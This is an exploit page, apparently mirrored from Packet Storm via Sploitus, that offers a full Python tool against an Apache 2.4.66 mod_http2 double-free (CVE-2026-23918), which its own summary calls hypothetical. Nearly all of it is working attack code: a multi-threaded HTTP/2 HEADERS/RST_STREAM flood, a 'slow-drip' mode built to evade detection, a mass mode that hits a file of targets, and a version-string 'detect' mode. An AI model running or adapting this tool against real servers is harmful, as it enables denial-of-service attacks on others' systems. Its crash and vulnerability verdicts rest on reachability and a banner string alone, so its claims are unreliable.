Share
## https://sploitus.com/exploit?id=PACKETSTORM:223514
==================================================================================================================================
    | # Title     : Apache 2.4.66 HTTP/2 mod_http2 Double-Free DoS Vulnerability Tool                                                |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits)                                                 |
    | # Vendor    : https://archive.apache.org/dist/httpd/httpd-2.4.66.tar.gz                                                        |
    ==================================================================================================================================
    
    [+] Summary    :   This script is a multi-mode security tool targeting a hypothetical vulnerability in Apache HTTP Server (mod_http2) related to a double-free condition in HTTP/2 handling (CVE-2026-23918).
    
    [+] POC        :  
    
    #!/usr/bin/env python3
    
    import argparse
    import json
    import os
    import socket
    import ssl
    import sys
    import threading
    import time
    from dataclasses import dataclass, field
    from datetime import datetime
    from typing import Dict, List, Optional, Tuple
    
    try:
        import h2.config
        import h2.connection
        import h2.events
        HAS_H2 = True
    except ImportError:
        HAS_H2 = False
        print("[!] h2 library required. Install: pip3 install h2")
    class Color:
        RED = "\033[91m"
        GREEN = "\033[92m"
        YELLOW = "\033[93m"
        BLUE = "\033[94m"
        CYAN = "\033[96m"
        BOLD = "\033[1m"
        RESET = "\033[0m"
    def c(text: str, color: str) -> str:
        return f"{color}{text}{Color.RESET}" if sys.stdout.isatty() else text
    @dataclass
    class ExploitStats:
        connections: int = 0
        requests: int = 0
        resets: int = 0
        conn_errors: int = 0
        stream_errors: int = 0
        crashes: int = 0
        lock: threading.Lock = field(default_factory=threading.Lock)
        def inc(self, attr: str, delta: int = 1) -> None:
            with self.lock:
                setattr(self, attr, getattr(self, attr) + delta)
    def create_ssl_context() -> ssl.SSLContext:
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        ctx.set_alpn_protocols(["h2"])
        return ctx
    def establish_h2_connection(host: str, port: int, timeout: float = 5.0, use_ssl: bool = True) -> Tuple[Optional[socket.socket], Optional[h2.connection.H2Connection]]:
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(timeout)
            sock.connect((host, port))
            if use_ssl:
                ctx = create_ssl_context()
                sock = ctx.wrap_socket(sock, server_hostname=host)
            config = h2.config.H2Configuration(client_side=True)
            conn = h2.connection.H2Connection(config=config)
            conn.initiate_connection()
            sock.sendall(conn.data_to_send())
            data = sock.recv(8192)
            if not data:
                sock.close()
                return None, None
            conn.receive_data(data)
            sock.sendall(conn.data_to_send())
            return sock, conn
        except Exception:
            try:
                sock.close()
            except:
                pass
            return None, None
    class RapidRSTDoS:
        """Quick attack - Send HEADERS + RST_STREAM simultaneously"""
    
        def __init__(self, target: str, port: int, workers: int = 100, intensity: int = 7,
                     use_ssl: bool = True, timeout: float = 5.0, json_output: bool = False):
            self.target = target
            self.port = port
            self.num_workers = workers
            self.intensity = max(1, min(10, intensity))
            self.use_ssl = use_ssl
            self.timeout = timeout
            self.json_output = json_output
            self.running = True
            self.crashed = False
            self.stats = ExploitStats()
            self.start_time = None
        def is_server_alive(self) -> bool:
            sock, conn = establish_h2_connection(self.target, self.port, timeout=3.0, use_ssl=self.use_ssl)
            if sock is None:
                return False
            sock.close()
            return True
        def worker(self, worker_id: int) -> None:
            streams_per_conn = 50
            reset_interval = max(1, 11 - self.intensity)
            while self.running:
                sock, conn = establish_h2_connection(self.target, self.port, timeout=self.timeout, use_ssl=self.use_ssl)
                if sock is None:
                    self.stats.inc("conn_errors")
                    time.sleep(0.1)
                    continue
                self.stats.inc("connections")
                sent = 0
                try:
                    while sent < streams_per_conn and self.running:
                        try:
                            stream_id = conn.get_next_available_stream_id()
                            conn.send_headers(stream_id, [
                                (b":method", b"GET"),
                                (b":scheme", b"https" if self.use_ssl else b"http"),
                                (b":authority", self.target.encode()),
                                (b":path", b"/"),
                            ])
                            sock.sendall(conn.data_to_send())
                            self.stats.inc("requests")
                            if sent % reset_interval == 0:
                                conn.reset_stream(stream_id, error_code=1)
                                sock.sendall(conn.data_to_send())
                                self.stats.inc("resets")
                            sent += 1
                            time.sleep(0.001 * (11 - self.intensity))
                        except Exception:
                            self.stats.inc("stream_errors")
                            break
                    conn.close_connection()
                    sock.sendall(conn.data_to_send())
                except Exception:
                    pass
                finally:
                    try:
                        sock.close()
                    except:
                        pass
        def monitor(self) -> None:
            checks_since_alive = 0
            last_report = 0
            while self.running:
                time.sleep(0.5)
                alive = self.is_server_alive()
                if alive:
                    checks_since_alive = 0
                    elapsed = int(time.time() - self.start_time)
                    if elapsed - last_report >= 10:
                        last_report = elapsed
                        snap = {
                            "connections": self.stats.connections,
                            "requests": self.stats.requests,
                            "resets": self.stats.resets,
                        }
                        if self.json_output:
                            print(json.dumps({"elapsed_s": elapsed, "status": "alive", **snap}))
                        else:
                            print(f" [{elapsed}s] conns={snap['connections']} reqs={snap['requests']} resets={snap['resets']} {c('OK', Color.GREEN)}")
                else:
                    checks_since_alive += 1
                    if checks_since_alive >= 2 and not self.crashed:
                        self.crashed = True
                        self.stats.inc("crashes")
                        elapsed = int(time.time() - self.start_time)
                        if self.json_output:
                            print(json.dumps({"elapsed_s": elapsed, "status": "CRASHED"}))
                        else:
                            print(f"\n{c('!!! SERVER CRASHED !!!', Color.RED + Color.BOLD)} at t={elapsed}s")
                        self.running = False
                        return
        def run(self) -> None:
            if not HAS_H2:
                print(c("[!] h2 library required: pip3 install h2", Color.RED))
                return
            if not self.json_output:
                print_banner("CVE-2026-23918 - Apache Double-Free DoS")
                print(f"Target: {self.target}:{self.port}")
                print(f"Workers: {self.num_workers} | Intensity: {self.intensity}")
                print(f"SSL: {'On' if self.use_ssl else 'Off'}")
            if not self.is_server_alive():
                print(c(f"[!] Cannot reach {self.target}:{self.port}", Color.RED))
                return
            print(c("[+] Server reachable. Sending payloads...\n", Color.GREEN))
            self.start_time = time.time()
            workers = []
            for i in range(self.num_workers):
                t = threading.Thread(target=self.worker, args=(i,), daemon=True)
                t.start()
                workers.append(t)
            self.monitor()
            for t in workers:
                t.join(timeout=2)
            if self.crashed:
                print(c("\n[!] CRASH DETECTED - Double-free confirmed!", Color.RED + Color.BOLD))
            else:
                print(c("\n[-] Server still alive. Target may be patched.", Color.YELLOW))
    class SlowDripDoS:
        """Slow attack - avoids detection"""
        def __init__(self, target: str, port: int, workers: int = 5, intensity: int = 3,
                     duration_minutes: int = 30, use_ssl: bool = True, json_output: bool = False):
            self.target = target
            self.port = port
            self.num_workers = max(1, workers)
            self.intensity = max(1, min(5, intensity))
            self.duration_seconds = duration_minutes * 60
            self.use_ssl = use_ssl
            self.json_output = json_output
            self.running = True
            self.stats = ExploitStats()
            self.start_time = None
        def worker(self, worker_id: int) -> None:
            while self.running and (time.time() - self.start_time < self.duration_seconds):
                sock, conn = establish_h2_connection(self.target, self.port, use_ssl=self.use_ssl)
                if sock is None:
                    self.stats.inc("conn_errors")
                    time.sleep(0.5)
                    continue
                self.stats.inc("connections")
                try:
                    stream_id = conn.get_next_available_stream_id()
                    conn.send_headers(stream_id, [
                        (b":method", b"GET"),
                        (b":scheme", b"https" if self.use_ssl else b"http"),
                        (b":authority", self.target.encode()),
                        (b":path", b"/"),
                    ])
                    sock.sendall(conn.data_to_send())
                    self.stats.inc("requests")
                    time.sleep(0.01)
                    conn.reset_stream(stream_id, error_code=1)
                    sock.sendall(conn.data_to_send())
                    self.stats.inc("resets")
                    conn.close_connection()
                    sock.sendall(conn.data_to_send())
                except Exception:
                    self.stats.inc("stream_errors")
                finally:
                    try:
                        sock.close()
                    except:
                        pass
                delay = max(1.0, (6 - self.intensity) * 2.0)
                time.sleep(delay)
        def run(self) -> None:
            if not HAS_H2:
                print(c("[!] h2 library required", Color.RED))
                return
            if not self.json_output:
                print_banner("CVE-2026-23918 - Slow-Drip Stealth DoS")
                print(f"Target: {self.target}:{self.port}")
                print(f"Duration: {self.duration_seconds // 60} min | Workers: {self.num_workers}")
            self.start_time = time.time()
            workers = []
            for i in range(self.num_workers):
                t = threading.Thread(target=self.worker, args=(i,), daemon=True)
                t.start()
                workers.append(t)
            try:
                while self.running and (time.time() - self.start_time < self.duration_seconds):
                    time.sleep(10)
                    elapsed = int(time.time() - self.start_time)
                    if not self.json_output:
                        print(f" [{elapsed}s] connections={self.stats.connections} resets={self.stats.resets}")
            except KeyboardInterrupt:
                pass
            self.running = False
            for t in workers:
                t.join(timeout=2)
    class MassAttack:
        """Attack on multiple targets"""
        def __init__(self, targets_file: str, workers_per_target: int = 50,
                     intensity: int = 7, duration_minutes: int = 30,
                     use_ssl: bool = True, json_output: bool = False):
            self.targets = self._load_targets(targets_file)
            self.workers_per_target = workers_per_target
            self.intensity = max(1, min(10, intensity))
            self.duration_seconds = duration_minutes * 60
            self.use_ssl = use_ssl
            self.json_output = json_output
            self.running = True
            self.start_time = None
            self.target_results = {}
        @staticmethod
        def _load_targets(path: str) -> List[Tuple[str, int]]:
            targets = []
            with open(path) as f:
                for line in f:
                    line = line.strip()
                    if not line or line.startswith("#"):
                        continue
                    if ":" in line:
                        host, port = line.rsplit(":", 1)
                        targets.append((host.strip(), int(port.strip())))
                    else:
                        targets.append((line.strip(), 443))
            return targets
        def worker(self, host: str, port: int) -> None:
            reset_interval = max(1, 11 - self.intensity)
            sent = 0
            while self.running and (time.time() - self.start_time < self.duration_seconds):
                sock, conn = establish_h2_connection(host, port, use_ssl=self.use_ssl)
                if sock is None:
                    time.sleep(0.5)
                    continue
                try:
                    while self.running and (time.time() - self.start_time < self.duration_seconds):
                        try:
                            sid = conn.get_next_available_stream_id()
                            conn.send_headers(sid, [
                                (b":method", b"GET"),
                                (b":scheme", b"https" if self.use_ssl else b"http"),
                                (b":authority", host.encode()),
                                (b":path", b"/"),
                            ])
                            sock.sendall(conn.data_to_send())
                            sent += 1
                            if sent % reset_interval == 0:
                                conn.reset_stream(sid, error_code=1)
                                sock.sendall(conn.data_to_send())
                        except Exception:
                            break
                    conn.close_connection()
                    sock.sendall(conn.data_to_send())
                except Exception:
                    pass
                finally:
                    try:
                        sock.close()
                    except:
                        pass
        def run(self) -> None:
            if not HAS_H2:
                print(c("[!] h2 library required", Color.RED))
                return
            if not self.json_output:
                print_banner("CVE-2026-23918 - Mass DoS Attack")
                print(f"Targets: {len(self.targets)} | Duration: {self.duration_seconds // 60} min")
            self.start_time = time.time()
            all_workers = []
            for host, port in self.targets:
                for _ in range(self.workers_per_target):
                    t = threading.Thread(target=self.worker, args=(host, port), daemon=True)
                    t.start()
                    all_workers.append(t)
            try:
                while self.running and (time.time() - self.start_time < self.duration_seconds):
                    time.sleep(15)
                    elapsed = int(time.time() - self.start_time)
                    if not self.json_output:
                        print(f" [{elapsed}s] Attacking {len(self.targets)} targets...")
            except KeyboardInterrupt:
                pass
            self.running = False
    def detect_vulnerability(target: str, port: int, timeout: float = 5.0, json_output: bool = False) -> Dict:
        """Detecting the vulnerability without exploiting it"""
        result = {
            "target": f"{target}:{port}",
            "timestamp": datetime.now().isoformat(),
            "reachable": False,
            "http2_supported": False,
            "server_header": None,
            "apache_version": None,
            "vulnerable": False,
        }
        sock, conn = establish_h2_connection(target, port, timeout=timeout, use_ssl=True)
        if sock is None:
            result["notes"] = "Target not reachable or HTTP/2 not supported"
            if json_output:
                print(json.dumps(result))
            else:
                print(c(f"[-] {target}:{port} - Not reachable", Color.RED))
            return result
        result["reachable"] = True
        result["http2_supported"] = True
        try:
            stream_id = conn.get_next_available_stream_id()
            conn.send_headers(stream_id, [
                (b":method", b"GET"),
                (b":scheme", b"https"),
                (b":authority", target.encode()),
                (b":path", b"/"),
            ])
            conn.end_stream(stream_id)
            sock.sendall(conn.data_to_send())
            data = sock.recv(8192)
            if data:
                events = conn.receive_data(data)
                for event in events:
                    if isinstance(event, h2.events.ResponseReceived):
                        for name, value in event.headers:
                            if name.decode().lower() == "server":
                                result["server_header"] = value.decode()
                                if "apache" in result["server_header"].lower():
                                    parts = result["server_header"].split("/")
                                    if len(parts) > 1:
                                        result["apache_version"] = parts[-1].split()[0]
        except Exception as e:
            result["notes"] = str(e)
        sock.close()
        if result["apache_version"] == "2.4.66":
            result["vulnerable"] = True
            result["notes"] = "Apache 2.4.66 detected - VULNERABLE!"
        if json_output:
            print(json.dumps(result))
        else:
            print(f"Target: {result['target']}")
            print(f"HTTP/2: {'Yes' if result['http2_supported'] else 'No'}")
            print(f"Server: {result['server_header'] or 'Unknown'}")
            print(f"Apache: {result['apache_version'] or 'Unknown'}")
            if result['vulnerable']:
                print(c("Status: VULNERABLE to CVE-2026-23918", Color.RED + Color.BOLD))
            else:
                print(c("Status: Not vulnerable or unknown", Color.GREEN))
        return result
    def print_banner(title: str):
        print(f"\n{'=' * 60}")
        print(c(title, Color.BOLD + Color.RED))
        print(f"CVE-2026-23918 - Apache mod_http2 Double-Free DoS")
        print(f"{'=' * 60}\n")
    
    def main():
        parser = argparse.ArgumentParser(description="CVE-2026-23918 Apache HTTP/2 Double-Free Exploit")
        parser.add_argument("--target", "-t", help="Target IP or hostname")
        parser.add_argument("--port", "-p", type=int, default=443, help="Target port (default: 443)")
        parser.add_argument("--mode", "-m", choices=["dos", "slow-drip", "mass", "detect"], default="dos")
        parser.add_argument("--targets", "-T", help="File with target list for mass mode")
        parser.add_argument("--workers", "-w", type=int, default=100, help="Worker threads (default: 100)")
        parser.add_argument("--intensity", "-i", type=int, default=7, help="Intensity 1-10 (default: 7)")
        parser.add_argument("--duration", "-d", type=int, default=30, help="Duration in minutes (default: 30)")
        parser.add_argument("--no-ssl", action="store_true", help="Disable SSL (HTTP/2 clear text)")
        parser.add_argument("--json", action="store_true", help="JSON output")
        args = parser.parse_args()
        if args.mode in ("dos", "slow-drip", "detect") and not args.target:
            parser.error(f"--target required for mode '{args.mode}'")
        if args.mode == "mass" and not args.targets:
            parser.error("--targets file required for mass mode")
        use_ssl = not args.no_ssl
        if args.mode == "dos":
            exploit = RapidRSTDoS(
                target=args.target, port=args.port, workers=args.workers,
                intensity=args.intensity, use_ssl=use_ssl, json_output=args.json
            )
            exploit.run()
        elif args.mode == "slow-drip":
            exploit = SlowDripDoS(
                target=args.target, port=args.port, workers=args.workers,
                intensity=args.intensity, duration_minutes=args.duration,
                use_ssl=use_ssl, json_output=args.json
            )
            exploit.run()
        elif args.mode == "mass":
            exploit = MassAttack(
                targets_file=args.targets, workers_per_target=args.workers,
                intensity=args.intensity, duration_minutes=args.duration,
                use_ssl=use_ssl, json_output=args.json
            )
            exploit.run()
        elif args.mode == "detect":
            detect_vulnerability(args.target, args.port, json_output=args.json)
    if __name__ == "__main__":
        try:
            main()
        except KeyboardInterrupt:
            print(c("\n[!] Interrupted", Color.YELLOW))
            sys.exit(0)
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================